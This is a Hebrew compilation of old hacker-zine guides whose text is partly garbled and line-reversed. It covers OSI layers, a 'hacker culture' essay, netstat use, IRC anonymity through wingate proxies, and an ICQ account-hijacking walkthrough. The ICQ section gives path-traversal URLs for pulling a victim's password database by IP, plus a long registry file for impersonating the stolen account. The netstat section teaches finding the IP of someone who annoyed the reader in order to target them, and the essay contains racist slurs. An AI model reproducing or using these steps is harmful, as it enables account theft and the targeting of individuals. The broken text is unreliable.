‫כששני יישומים ברשת מתקשרים זה עם זה תפקיד השכבה הוא לקבוע איזה יישום מדבר ואיזה‬
‫ישיב‪,‬‬
‫השכבה גם מפקחת על כל מיני דברים אחרים למשל שפתאום החיבור לאינטרנט התנתק אז השכבה‬
‫הזאת היא‬

.‫זאתי שמתריעה אותך שהחיבור לאינטרנט התנתק‬
presentation ‫* שכבת‬
‫ היא משמשת גם להצפנה וגם לדחיסת נתונים כדי‬,‫השכבה הזו בעצם מכינה את ההודעות לשידור‬
‫שהעברה‬
.‫תהיה מהירה יותר‬
application ‫* שכבת‬
‫ כמו להוריד נתונים‬,‫זוהי השכבה שבה אתה מבקש מה לעשות ומערכת ההפעלה עושה את זה‬
‫ממחשב אחר‬
.‫ ומשם זה ממשיך‬transport ‫ השכבה שולחת את הבקשה לשכבת‬,‫או כל דבר אחר‬
:‫כל שבעת השכבות מחולקות לעוד שלושה חלקים‬
communication subnet ‫ נקראות‬physical, data link, network-‫שכבות ה‬
host process ‫ נקראות‬session, presentation, application-‫השכבות ה‬
.‫ משמשת כחוצץ בין שני החלקים האחרים‬transport ‫ההשכבה האמצעית‬
osi model and internet
application , presentation , session
||
||
,nfs, xdr, rpc
,telnet, ftp
.smtp, rip
transport
||
||
tcp, udp
network , data link , physical
||
||
ip, icmp
802.2
csma/cd 802.3
token bus 802.4
token ring 802.5
osi model and novell netware
application , presentation , session
||
||
ncp, netbios
,emulation
,netx, btrieve

,netware, rpc
,streams, tli
sap
transport
||
||
spx, ipx
network , data link , physical
||
||
802.2
csma/cd 802.3
token bus 802.4
token ring 802.5
]by [twix

‫תרבות ההאקרים‬
‫הקדמה‬
‫בטקסט זה נספר קצת על התרבות של ההאקרים של ימינו‪ ,‬נגדיר את סוגם ונאפיין כל אחד ואחד‬
‫מהם‪.‬‬
‫הטקסט אמור להבהיר את עמדתם של ההאקרים בפריצה לאתר או לשרת שהם בוחרים ואת‬
‫הסיבות‪.‬‬
‫אתם בטח שואלים את עצמכם‪ ,‬מה לעזאזל אני רוצה מכם ולמה אני בכלל מוציא את החרבון הזה‬
‫לאור?‬
‫הסיבה פשוטה‪...‬כי אני פדופיל משועמם ואין לי מה לעשות בחיים חוץ מלמשש את כפתורי המחשב‪.‬‬
‫ועכשיו ברצינות‪ ,‬נתחיל!‬
‫רוב ההאקרים‪ ,‬אפילו בלי ידיעתם של רבים מהם‪ ,‬לא יודעים למה הם פורצים בשיטה אחת או אחרת‪,‬‬
‫ולמה הם עושים נזק בלתי הפיך או נזק מזערי‪...‬אבל אנחנו ננסה להגדיר אותם במקומם‪.‬‬
‫אני בטוח שלא פעם ולא פעמיים נפגשתם באתר שנפרץ‪ ,‬ורואים שכל לינק שאתם מנסים להתחבר‬
‫אליו דרך השרת‪ ,‬מת‪.‬‬
‫הסיבה לזה פשוטה‪ ,‬ההאקר שלנו‪ ,‬מחק לא רק את כל העקיבות של הרשומות שעוקבות אחריו ]‪[logs‬‬
‫אלא גם את כל תוכן האתר\השרת‪.‬‬
‫ולמה הוא עשה את זה? ‪-‬גם כאן הסיבה בדרך כלל אחידה‪ ,‬פריצה מסוג זה באה בדרך כלל מסיבות‬
‫גזעניות‪ ,‬מה שבתקופה האחרונה אנחנו נתקלים בו הרבה למדיי‪...‬אז הבנאדם מחליט שמאכסן השרת‬
‫הזה חייב למות ושייקלוט את המסר שהוא לא רצוי פה‪...‬‬
‫עוד סיבה לפריצה מסוג זה‪ ,‬באה בגלל שהבנאדם רוצה להשוויץ שהוא גורו ]מין אליל[ ושאף אחד לא‬
‫מסוגל עליו‪ ,‬בגלל שהוא מחק מהייקום איזה שרת ערבי מסכן‪ ,‬שלמנהל שלו אין במילא ממה‬
‫להתפרנס‪ ,‬אז הוא אפילו לא מאבטח אותו כמו שצריך‪...‬אז ממה כבר יש לו להתלהב? ‪-‬אז הוא הריץ‬
‫באג‪..‬אז הוא השתלט על השרת‪..‬מרגיש גבר אה?‬
‫אז שתדעו‪ ,‬שרוב ההאקרים הם לא כאלה‪ ,‬והם לא פועלים סתם בגלל דחפים לאומיים וכיוצא בהם‪.‬‬
‫אז מה בעצם המטרה של ה‪"-‬האקר הלוחם" שלנו בפריצה?‬
‫המטרה היא להעביר מסר או נקמה‪] ,‬בדרך כלל תוקעים איזה דגל ישראל ברקע[‪.‬‬
‫הפריצה באה במטרה להרוס את היריב ולא שום דבר מעבר לכך‪...‬או בגלל שהבנאדם רק חזר מאיזה‬
‫דיסקוטק ביום שישי ואמא כבר במיטה עם המאהב‪ ,‬אז אין מה לעשות ואין כוח לישון‪]...‬והסיבה‬
‫הזאת מוצדקת[‪.‬‬
‫עכשיו נגלה את הצד של ה‪"-‬האקר החיובי"‪:‬‬
‫ההאקר החיובי‪ ,‬הוא בעצם האקר\מאבטח‪ ,‬שהמטרה שלו בפריצה היא בדרך כלל להזהיר את מנהל‬
‫השרתים מאיזה באג באחת התוכנות\שרתים שמותקנים על השרת שלו‪.‬‬
‫כך מנהל השרת ייתקן את הבאג ושני הצדדים יהיו מבסוטים ואפילו לפעמים הפורץ ייקבל איזושהי‬
‫תמורה למעשה!‬
‫ התנאי הוא‪ ,‬שהפורץ החכם שלנו‪ ,‬לא יימחק את דף המקור‪ ,‬אלא רק יישנה את שמו‪ ,‬ואת הדף אותו‬‫הוא רוצה לעלות במקום‪ ,‬הוא יישנה לשם של דף האינדקס לדוגמא‪http://www.tuvia-the- :‬‬
‫‪kli.com/index.html‬‬
‫והאתר ייעלה תחת הקובץ שאותו שם הפורץ‪ ,‬שם הוא יכול לכתוב מה שבא לו‪...‬אבל הפורץ‬
‫המתורבת‪ ,‬ישים רק אזהרה למנהל השרת‪ ,‬ויציין את תיבת הדואר האלקטרוני שלו‪ ,‬ואת שם הקובץ‬
‫אותו הוא שינה‪.‬‬
‫אתם בטח שואלים את עצמכם‪":‬אבל מושיקו הוא כושון נחמד‪ ,‬למה לשרוף אותו?" ‪-‬נו טוב‪...‬זה מה‬
‫שאני הייתי שואל את עצמי‪ ,‬אבל נתעלם מזה‪.‬‬
‫השאלה שתצוץ בראש היא‪ ,‬מה ייצא לי מזה בכלל?!?!‬
‫התשובה פשוטה‪ :‬אתה תיחשב בתור האקר עם כבוד‪ ,‬ולא סתם אחד שאין לו חיים‪ ,‬אז הוא מוחק‬
‫אתרים‪...‬והרבה פעמים‪ ,‬מנהל השרת גם יימליץ עליכם לאחרים‪ ,‬וככה אולי אפילו תזכו להרבה‬
‫צ'ופרים ואולי אפילו עבודה!‬

‫בזמן האחרון‪ ,‬ההאקר החיובי תופס תאוצה ברשת‪ ,‬כי רוב ההאקרים מבינים שאם הם ימשיכו בדרך‬
‫השלילית‪...‬זה יוביל אותם לקינוס המחשב שלהם‪ ,‬ואולי אפילו לתיקים פליליים‪...‬אז בשביל מה כל‬
‫הבלאגן?‬
‫חשוב לזכור‪:‬‬
‫לא תמיד מנהל השרת יחשיב את הפריצה שלכם כמשהו חיובי‪ ,‬ובכל רגע הוא יכול להסתכל על‬
‫הלוגים שלנו ]רשומות[ אלא אם לא מחקתם אותם‪ ,‬ופשוט לדווח עליכם למשטרה או לספק‬
‫האינטרנט שלכם ‪-‬שבשמחה יירצה לקחת ממכם את חשבון האינטרנט שלכם אפילו אם הוא מרוויח‬
‫מזה‪...‬‬
‫מסקנה‪:‬‬
‫אם אתם בוחרים ללכת על האקינג‪ ,‬תחשבו טוב טוב איזה סוג של "פרצנים" אתם רוצים‬
‫להיות‪...‬תחשבו אם בכלל כדאי לכם להיכנס לעסק המלוכלך‪ ,‬ואם כן‪ ,‬אז שתדעו טוב יותר את‬
‫הדברים שלפניכם‪...‬‬
‫‪by cntax‬‬

‫מידע על ‪ ip‬וערוצים(‪ )ports‬על‪-‬ידיי פקודת ‪netstat‬‬
‫תוכן עניינים‪:‬‬
‫מבוא‬
‫א‪ .‬שימוש ב‪netstat-‬‬
‫ב‪ .‬פענוח ערוצים פתוחים‬
‫ג‪ .‬שימוש ב‪ netstat-‬לגילוי מספרי ‪ ip‬של משתמשי תוכנת ‪icq‬‬
‫ד‪ .‬שימושים נוספים‬
‫ה‪ .‬כלים ועזרים‬
‫ו‪ .‬טיפים שימושיים‬
‫ז‪ .‬סיכום‬
‫מבוא‬
‫אתם קוראים מדריך של ארגון ההאקרים הישראלי‪ ,‬אנא התעלמו משגיאות כתיב‪.‬‬
‫אני מקווה שתרכשו יידע מעמיק יותר מקריאת טקסט זה‪ ,‬והעיקר הוא שתהנו מקריאתכם!‬
‫אני מציע שתדפיסו את הטקסט בכדיי שיהיה לכם נוח יותר לקרוא אותו‪.‬‬
‫קריאה מהנה‪.cntax ,‬‬
‫א‪ .‬שימוש ב‪netstat-‬‬
‫הפעלת התוכנה‪:‬‬‫לחצו על ]‪([start‬התחל בגירסא העברית) ]‪([programs‬תוכנות או עזרים) ]‪.[ms-dos prompt‬‬
‫‪ netstat‬היא תוכנה מאוד שימושית שמתאימה להרבה משימות‪ .‬אני אישית משתמש בתוכנה בכדיי‬
‫להשיג מספרי ‪ ip‬של אנשים שאני מדבר איתם ב‪ .icq-‬כמו כן אפשר להשתמש ב‪ netstat-‬על מנת לאתר‬
‫פריצות של סוסים טרויאנים(‪ )trojans‬במחשבכם או סתם בכדיי לראות את תנועת הערוצים‪.‬‬
‫הסתכלו על הדוגמא שלפניכם של הפלט שנותנת התוכנה בעת הקשת‪ netstat :‬בשורה‪c:\windows :‬‬
‫בחלון ‪.ms-dos prompt‬‬
‫‪c:\windows>netstat‬‬
‫‪active connections‬‬
‫‪proto local address‬‬
‫‪foreign address‬‬
‫‪state‬‬
‫‪tcp pavilion:25872‬‬
‫‪warlock:1045‬‬
‫‪established‬‬
‫‪tcp pavilion:25872‬‬
‫‪sy-as-09-112.free.net.au:3925 established‬‬
‫‪tcp pavilion:31580‬‬
‫‪warlock:1046‬‬
‫‪established‬‬
‫‪tcp pavilion:2980‬‬
‫‪205.188.2.9:5190‬‬
‫‪established‬‬
‫‪pavilion:3039‬‬
‫‪24.66.10.101.on.wave.home.com:1031 established‬‬

‫‪tcp‬‬

‫עכשיו בואו נסתכל על הדוגמא‪ .‬אתם רואים ]‪ [proto‬בצדו השמאלי של המסך‪.‬‬
‫אחריו תראו ]‪ [foreign address‬שורה זו תתן לנו את מספר ה‪ ip-‬או‪/‬ו שם השרת של המשתמש ואת‬
‫הערוץ(‪ )port‬עליו הוא נמצא בצורה הבאה‪ ip:port :‬עם "‪ ":‬בין מספר ה‪ ip-‬לערוץ‪.‬‬
‫ובסוף תמצאו את המילה ]‪([state‬מצב) מה שפשוט מראה את מצב הערוץ(‪.)port‬‬
‫חלק זה יכול להיות במצב‪ established-‬במצב מחובר או‪ waiting connect-‬אם אם הוא במצב‬
‫האזנה(למידע)‪.‬‬
‫עכשיו עם יידע זה אנחנו עוברים לשלב מתקדם יותר על איך להשתמש בתוכנה בכדיי לפענח ערוצים‬
‫פתוחים‪.‬‬
‫ב‪ .‬פענוח ערוצים פתוחים‬
‫קרה לכם שמשהו מוזר קורה למחשב שלכם? הסי‪.‬די‪-‬רום נפתח בעצמו? המסך נכבה בלי שכיביתם‬
‫אותו? ואתם שואלים את עצמכם מה לעזאזל קורה פה?‪...‬ולפתע מבינים שמישהו פורץ לכם למחשב‬

‫בעזרת טרויאן(‪.)trojan‬‬
‫אז עכשיו המשימה שלכם היא לבדוק איזה טרויאן שלחו לכם ולהשמיד אותו נכון? ובכן אתם‬
‫צודקים‪.‬‬
‫אז לכו שוב ל‪ .ms-dos prompt-‬עכשיו יש לנו הרבה אפשרויות שאפשר להשתמש בהם דרך ‪netstat‬‬
‫אז אתם יכולים לכתוב כך על מנת לקבל את תפריט העזרה של ‪:netstat‬‬
‫‪c:\windows>netstat help‬‬
‫(אולי אני אכתוב תוסף שיופיע בו התפריט במצב מתורגם)‬
‫תעיינו בתפריט ותחזרו לכאן‪...‬‬
‫קראתם?‪...‬אז בואו נמשיך‪...‬‬
‫אני אישית אוהב את הפקודה (‪ )c:\windows\netstat -an‬שמראה את כל הערוצים(‪ )ports‬הפתוחים‬
‫ואת כל החיבורים בצירוף כתובת ה‪ ip-‬במקום שם השרת(‪.)hostname‬‬
‫עכשיו כשאתם יודעים לבדוק את החיבורים‪ ,‬אתם יכולים לחפש ערוצים של טרויאנים כמו ‪(12345‬‬
‫‪ netbus‬הישן) כמו ‪ )sub seven(1243‬וכו'‪.‬‬
‫עכשיו כל מה שלמדתם יהיה מאוד שימושי לכל הצרכים שלכם שמייד תגלו‪ ,‬אבל קודם לכו תעשו‬
‫הפסקה קטנה כדיי שכל המידע שקיבלתם עד עכשיו ייספג לכם טוב טוב למוח ותחזרו לפה מוכנים‬
‫ללמוד עוד!‬
‫ג‪ .‬שימוש ב‪ netstat-‬לגילוי מספרי ‪ ip‬של משתמשי תוכנת ‪icq‬‬
‫האם אי‪-‬פעם רציתם להשיג את ה‪ ip-‬של מישהו שעיצבן אותכם ב‪ icq-‬אבל הוא היה מוסתר או‬
‫שפשוט לא הופיע? אני מתאר לעצמי שכן‪...‬אז בואו נלמד שיטה שתעזור לנו למצוא ‪ ip‬של אנשים‬
‫שמחוברים ל‪ icq-‬שלנו‪.‬‬
‫גילוי מספר ‪ ip‬של משתמש ‪ icq‬דרך ‪- netstat‬‬
‫בכדיי להשיג מספר ‪ ip‬של המשתמש‪ ,‬עליכם לפתוח את ה‪ ms-dos prompt-‬ולעשות ‪netstat -n‬‬
‫(בכדיי לראות את כל רשימת הפורטים הפתוחים) לפני שהתחלתם לדבר איתו ב‪ ,icq-‬רשמו את‬
‫המספרים על דף או מסמך‪.‬‬
‫עכשיו הגיע הזמן לגלות את מספר ה‪ ip-‬שלו‪ .‬שלחו למשתמש הודעה עכשיו עשו במהירות ‪netstat -n‬‬
‫ותתווסף לכם שורה חדשה של מספר ‪ ,ip‬עכשיו גלו בעזרת הרשימה שעשיתם את המספר החדש‪,‬‬
‫עכשיו יש לכם את המספר של המשתש בלי להשתמש בכל מיני פריצות ופאצ'ים(שלא תמיד עובדים)‬
‫עכשיו אחרי לכדתם את המספר שלו אתם יכולים לעשות איתו מה שבא לכם! כיף לא?‬
‫ד‪ .‬שימושים נוספים‬
‫ב‪ netstat-‬אפשר להשתמש להשגת ‪ ip‬של כל דבר וכל אחד‪ ,‬כל עוד יש חיבור ישיר בין שני‬
‫הכיוונים(בינך לבין התוכנה או בין המשתמש השני) לדוגמא‪:‬העברת קבצים‪ ,‬הודעות ישירות‪ ,‬צ'אט‬
‫של ‪ ,icq‬במירק(‪ )mirc‬ועוד‪...‬‬
‫ד‪ .‬כלים ועזרים‬
‫סריקת ערוצים‪ :‬בכדיי לבדוק ערוצים(‪ )ports‬פתוחים במחשב(לא שלכם ‪)):‬‬
‫]‪ - [seventh sphere port scanner‬שני אתרים למקרה שאחד האתרים נפל‬
‫‪http://members.xoom.com/cryptog/7spereportscan.exe‬‬
‫‪http://members.xoom.com/gohan_3/7spereportscan.exe‬‬
‫]‪ - [lockdown 2000‬תוכנה למניעת פריצות למחשב האישי‬
‫‪http://www.lockdown.com‬‬
‫]‪ - [icq‬למי שעדיין אין לו(למרות שלא נראה לי שיש מישהו כזה‪)..‬‬
‫‪http://web.icq.com‬‬
‫ה‪ .‬טיפים שימושיים‬
‫א‪ .‬לפעמים ‪ netstat‬פולט רשימות ארוכות מאוד מה שעלול להקשות ולבלבל משתמש מתחיל‪ .‬אם‬
‫אתם מתקשים‪ ,‬פשוט תריצו את ‪ netstat‬ללא שום פקודות ותיצרו קשר עם המשתמש השני(על ידיי‬
‫שליחת‪/‬קבלת הודעה מהמשתמש השני) ואז תריצו את ‪ netstat‬שנית‪ .‬צריכה להופיע שורה חדשה ‪ -‬זה‬

‫מה שאתם מחפשים!‬
‫ב‪ .‬יבוא בגירסא הבאה‪...‬‬
‫ו‪ .‬לסיכום‬
‫אני מאוד מקווה שהמדריך העניק לכם יידע ושמעכשיו תתחילו להתנסות בדרכים מקצועיות יותר‬
‫כמו זו‪.‬‬
‫אני מבטיח שעוד הרבה מאוד מדריכים יגיעו בהמשך ויילוו אתכם לאורך כל הדרך‪ ,‬עד שתהייו‬
‫איינשטיינים קטנים! טוב‪...‬אולי הגזמתי ‪ ):‬אז בקיצור תכנסו לאתר שלנו בכדיי להתעדכן בעולם‬
‫ההאקרים וכל העולם התחתון!‬
‫‪by tricker‬‬
‫תורגם ע"י ‪cntax‬‬

‫אנונימיות ב‪irc -‬‬
‫שלום לכולם במדריך זה אני יראה לכם כמה שיטות איך להיות אנונימי ב‪ irc-‬כתבתי את המדריך‬
‫הזה מכיוון‬
‫שכל הזמן שואלים אותי איך להסתיר את האי פי שלי אז תקראו ותבינו אז יאללה נתחיל‬
‫שיטה ‪:1-‬‬
‫במירק ישנה אפשרות לשרתים שתומכים בזה להסתרת האיי פי וזה הולך ככה‬
‫'‪( '/mode yournick +x‬בלי הגרשים)‬
‫זה אומר לשרת ‪ irc‬אם הוא תומך בזה להסתיר את האיי פי אם מישהו עושה עליך ‪whois‬‬
‫שיטה‪ 2-‬דרך ‪ wingate‬הדרך הקלה‬
‫כל מה שאתה צריך לעשות בשיטה הזאת זה ללכת ל‪:‬‬
‫‪file --> option --> firewall‬‬
‫ולסמן את האפשרות‬
‫‪use socks firewall‬‬
‫ולהכניס שרת ‪ wingete‬בפורט ‪1080‬‬
‫שיטה‪ 3-‬דרך ‪ wingate‬הדרך הקשה‬
‫תכנס את הפקודה הבא כאשר את במצב ‪offline‬‬
‫‪/server wingate-ip:[port 23] ie /server xxx.xxx.xxx)ip address( 23‬‬
‫עכשיו אתה מחובר ל ‪wingate‬‬
‫עכשיו להתחבר לשרת מירק שאתה רוצה תכניס את השורה הבא‬
‫‪/quote irc.server.com 6667‬‬
‫את הצעד הבא תצטרך לבצע מהר לפני שתקבל פינג תכניס את השורות הבאות‬
‫‪/quote user god bikkel snikkel urnick‬‬
‫‪/quote nick urnick‬‬
‫אם יש לכם תגובות או בקשות שלחו לי איי מיל‬
‫‪elidor86@hotmail.co.il‬‬
‫‪by vb-man‬‬

‫קיו‬.‫סי‬.‫פריצה לאי‬
.)‫קובץ הסבר על להשיג סיסמאות של משתמשים אחרים & להתלבש על המספר שלהם(בלי הסיסמא‬
.)‫הרבה אנשים רצו לדעת איך לעשות את זה וזה ממש קל (למי שחשב שזה קשה‬
.‫ אז עם לא עובד לכם אל תבואו בטענות‬,‫ זה לא תמיד עובד‬- ‫אבל יש בעיה קטנה קטנה‬
:‫ תוודאו שאתם יודעים את הדברים הבאים‬- ‫קודם‬
.‫ והוא לא נגע בהגדרות שהאיסיקיו שם לא לאחר ההתקנה‬99 ‫& שהוא הוריד את גירסא‬
.‫ לא אני כתבתי את האיסיקיו אז מצטער‬,‫אני יודע שזה קצת מעיק אבל אין מה לעשות‬
.‫זה טוב לעבוד על ליימרים או אנשים שאתם יודעים מה קורה אצלהם במחשב‬
.‫& איפי של המשתמש שאתם רוצים לגלות את סיסמתו‬
.‫& מספר האי סי קיו של המשתמש שאתם רוצים לגלות את סיסמתו‬
‫ הורידו את הקבצים הבאים‬.1
http://123.123.123.123/.html/....../db/uin.idx
http://123.123.123.123/.html/....../db/uin.dat
http://123.123.123.123/.html/....../db/uinmsg.dat
http://123.123.123.123/.html/....../db/uinmsg.idx
http://123.123.123.123/.html/....../db/uinhis.idx
http://123.123.123.123/.html/....../db/uinhis.dat
.‫ שימו את המספר שלו‬uin - ‫ החליפו במספר האיפי של הקורבן ובמקוםה‬123.123.123.123 - ‫*את ה‬
‫ לא שמונה(הם השורות לגישה של התיקיה של האיסיוקיו של‬,‫**יש שש נקודות באמצע השורה‬
.)‫הקורבן‬
.‫כאן יש להשתמש באקספוילט אחר אשר לא בגכל הפעמים זקוקים לו‬
:‫פתחו קובץ טקסט חדש והעתיקו את השורות הבאות לשם‬.2
.‫ למספר של הקורבן שלכם‬hackeduin ‫ להחליף את המילה‬: ‫*** לזכור‬
"hkey_current_user\software\mirabilis\icq\owners\hackeduin]"name"="hacked uin]
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs]
random groups version"=dword:0000000a"online color"=dword:00ff0000"
unlisted color"=dword:00800000"offline color"=dword:000000ff"
authorize color"=dword:00400080"notify color"=dword:00800080"
laststatus color"=dword:00008000"
""="default file dir"="c:\\program files\\icq\\received files""smtp address"
""="dnd message"="please do not disturb me now. disturb me later.""out message"
".busy message"="user is occupied. only urgent messages will be delivered"
chat message"="i would like to chat about anything""away prenum"=dword:00000000"
out prenum"=dword:00000000"busy prenum"=dword:00000000"
dnd prenum"=dword:00000000"chat prenum"=dword:00000000"
file options"=dword:00000004"url options"=dword:00000004"
chat options"=dword:00000004"all options"=dword:0000000e"
"ext options"=dword:00000004"startup"="no""auto away"="no"
"auto hide time"=dword:0000001e"auto hide"="no""move server top"="no"
"blink in tray"="no""sort lists"="yes""show online list"="no"
"remove addfriend"="yes""splash open"="yes""history last first"="yes"
"floattop"="yes""thru server"="no""join chat"="no""open url browser"="no"
"refuse file notinlist"="no""overwrite existfile"="no"
"disable online alert"="yes""accept urgent in busy"="no"
"blink tray in awaybusy"="yes""use contact list color"="no"
"contact list color"=dword:00c8b99d"save user file"="yes""auto update"="yes"
"search wizard"="no""default mailer"="yes""pop play sound"="yes"
pop auto launch"="no""pop check"="no""pop time"=dword:0000000a"
"check headers"="yes""movetooutdelay"=dword:00000014"movetoout"="no"
"movetoawaydelay"=dword:0000000a"movetoaway"="no""auto sleep mode"="no"
"log history events"="yes""connection type"="permanent""firewall"="yes"
usegivenip"="no""socks"="no""socksport"=dword:00000438"
"socksserver"="enter your socks server"
proxysocks4host"="enter your proxy server""proxysocks4port"=dword:00000438"
useproxysocks4"="no""givestats"="no""socksversion"=dword:00000004"
socksauthentication"=dword:00000000"firewalltimeout"=dword:0000001e"
"usefirewalltimeout"="no""usefirewallrangeports"="yes"
firewallfromport"=dword:000059d8"firewalltoport"=dword:00007148"

";"="old sockets"="no""usertype"=dword:00000000"mail receipients"
random available"="no""randomgroupname"=dword:00000001"
"random name"="#¥d¶³ 666 £[""allow secure clients only"="yes"
phoneapproval"="yes""phonetonetime"=dword:00000032"
phonepausetime"=dword:000001f4"phonebreaktime"=dword:00000028"
" "="phonesettings"=dword:00000001"phonepausechar"=",""phonelocalp"
"phonelongp"=" ""phoneinterp"=" ""chat roomname"="product support / suggestion"
auto join chat room"="yes""novice counter"=dword:0000000a"
menu counter"=dword:00000013"servers version"=dword:00000001"
externals version"=dword:00000019"
\,stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"novice"="no"00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
dropped users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00"
state flags"=dword:00000000"server msg version"=dword:0000000b"
server msg shown"=dword:00000001"server msg count"=dword:00000009"
"leftbutton warning"="no""menu left click"="no""tip startup"="no"
"tip position"=dword:00000000"moreevents warning"="no""invisible warning"="no"
"send later warning off"="no""busy warning"="no""away warning"="no"
"dnd warning"="no""ft warning"="no""ext warning"="no""out warning"="no"
"chat warning"="no"
"away message"="user is currently away\r\nyou can leave him/her a message"
random comment"="you won't be hurt by things you don't care.\r\n\r\n(c) calvin's labs, 1993-1998. no"
".rights reserved.\r\nit's not a secret. it's not a magic. it's not a myth
[hkey_current_user\software\mirabilis\icq\owners\youruin\prefs\presets]
"!outmsg presets 0"="i'm out'a here. see you tomorrow"
".dndmsg presets 0"="please do not disturb me now. disturb me later"
"away presetsmsg 0"="away""out presetsmsg 0"="out for the day"
"busy presetsmsg 0"="busy""dnd presetsmsg 0"="dnd""chat presetsmsg 0"="chat"
".awaymsg presets 1"="i am out to lunch. i will return shortly"
""="outmsg presets 1"
".dndmsg presets 1"="i am currently in a meeting. i can't be disturbed"
"chatmsg presets 1"="come join my chat room!""away presetsmsg 1"="lunch"
"out presetsmsg 1"="not here""busy presetsmsg 1"="meeting"
"dnd presetsmsg 1"="meeting""chat presetsmsg 1"="come in"
"!awaymsg presets 2"="don't go anywhere! i'll be back in a jiffy"
".outmsg presets 2"="i'm closed for the weekend/holidays"
"!dndmsg presets 2"="don't disturb my concentration"
"!chatmsg presets 2"="don't miss out on the fun! join our chat"
"away presetsmsg 2"="be right back""out presetsmsg 2"="closed"
"busy presetsmsg 2"="concentration""dnd presetsmsg 2"="concentration"
"chat presetsmsg 2"="fun"
".awaymsg presets 3"="i'm out with the dog. be back when he's finished"
".'outmsg presets 3"="gone fishin"
"!dndmsg presets 3"="i'm on the phone with a very important client. don't disturb me"
"!chatmsg presets 3"="what are you waiting for? come on in"
"away presetsmsg 3"="dog walk""out presetsmsg 3"="fishing"
"busy presetsmsg 3"="on the phone""dnd presetsmsg 3"="on the phone"
" .chat presetsmsg 3"="don't wait""awaymsg presets 4"="went out for a smoke"
".outmsg presets 4"="i'm sleeping. don't wake me"
".dndmsg presets 4"="i can't chat with you now. i'm busy"
".chatmsg presets 4"="we'd love to hear what you have to say. join our chat"
"away presetsmsg 4"="smoke""out presetsmsg 4"="sleeping"
" busy presetsmsg 4"="can't chat ""dnd presetsmsg 4"="can't chat"
".chat presetsmsg 4"="hear""awaymsg presets 5"="on my coffee break"
".outmsg presets 5"="went home. had to feed the kids"
"?dndmsg presets 5"="can't you see i'm working"
"chatmsg presets 5"="enter your chat room message here"
"away presetsmsg 5"="coffee""out presetsmsg 5"="kids"
"busy presetsmsg 5"="working""dnd presetsmsg 5"="working"
".chat presetsmsg 5"="empty""awaymsg presets 6"="went to get some fresh air"
".outmsg presets 6"="gone for good"
"dndmsg presets 6"="enter your occupied message here"

"chatmsg presets 6"="enter your chat room message here""away presetsmsg 6"="air"
"out presetsmsg 6"="gone""busy presetsmsg 6"="conversing"
"dnd presetsmsg 6"="empty""chat presetsmsg 6"="empty"
".busymsg presets 7"="user is occupied. only urgent messages will be delivered"
"dndmsg presets 7"="enter your occupied message here"
"chatmsg presets 7"="enter your chat room message here"
"away presetsmsg 7"="empty""out presetsmsg 7"="empty""busy presetsmsg 7"="empty"
"dnd presetsmsg 7"="empty""chat presetsmsg 7"="empty"
"busymsg presets 0"="user is currently occupied"
"chatmsg presets 0"="i would like to chat about anything"
"busymsg presets 1"="user is currently occupied1"
"busymsg presets 2"="user is currently occupied2"
"busymsg presets 3"="user is currently occupied"
"busymsg presets 4"="user is currently occupied"
"busymsg presets 5"="user is currently occupied"
"busymsg presets 6"="user is currently occupied"
"awaymsg presets 7"="user is currently away"
"outmsg presets 7"="user is currently n/a"
"awaymsg presets 0"="user is currently away\r\nyou can leave him/her a message"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd]
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd\message0]
".message"="please bookmark our network status page"
""="urlname"="http://www.mirabilis.com/status.html""url"="press here""date"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd\message1]
"urlname"="http://www.mirabilis.com/emailsig.html"
""="url"="go to the icq e-mail signature generator""date"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd\message2]
message"="icq is doing it again! one more new service from icq for your pleasure! create your icq interest"
") !group - home, work, family, hobby, affiliation, sports, music...etc..( it's straight forward, no html needed
"urlname"="http://www.icq.com/announcements/02.html"
"url"="it's fun and easy, go!!""date"="31-mar-98"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd\message3]
"!urlname"="http://www.icq.com/announcements/whitepages.html""url"="go"
"date"="1-apr-98"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd\message4]
message"="icq can notify you when you receive an e-mail and show you the e-mail headers! learn how to"
"!do it
"urlname"="http://www.mirabilis.com/email.html"
"url"="e-mail notification instructions""date"="15-jun-98"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd\message5]
"urlname"="http://www.icq.com/announcements/05.html""url"="create your greeting"
"date"="12-jul-98"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd\message6]
"urlname"="http://www.icq.com/announcements/06.html"
"url"="click for more information""date"="26-aug-98"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd\message7]
"!message"="icq can alert you when you receive emails and show you the email headers"
"urlname"="http://www.icq.com/announcements/07.html""url"="learn how to do it"
"date"="06-sept-98"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd\message8]
"urlname"="http://www.icq.com/announcements/06.html"
"url"="click for more information""date"="20-oct-98"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\randomgroups]
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\randomgroups\randomgroup1]
name"="general chat""number"=dword:00000001"version"=dword:00000001"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\randomgroups\randomgroup2]
name"="romance""number"=dword:00000002"version"=dword:00000002"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\randomgroups\randomgroup3]
name"="games""number"=dword:00000003"version"=dword:00000003"
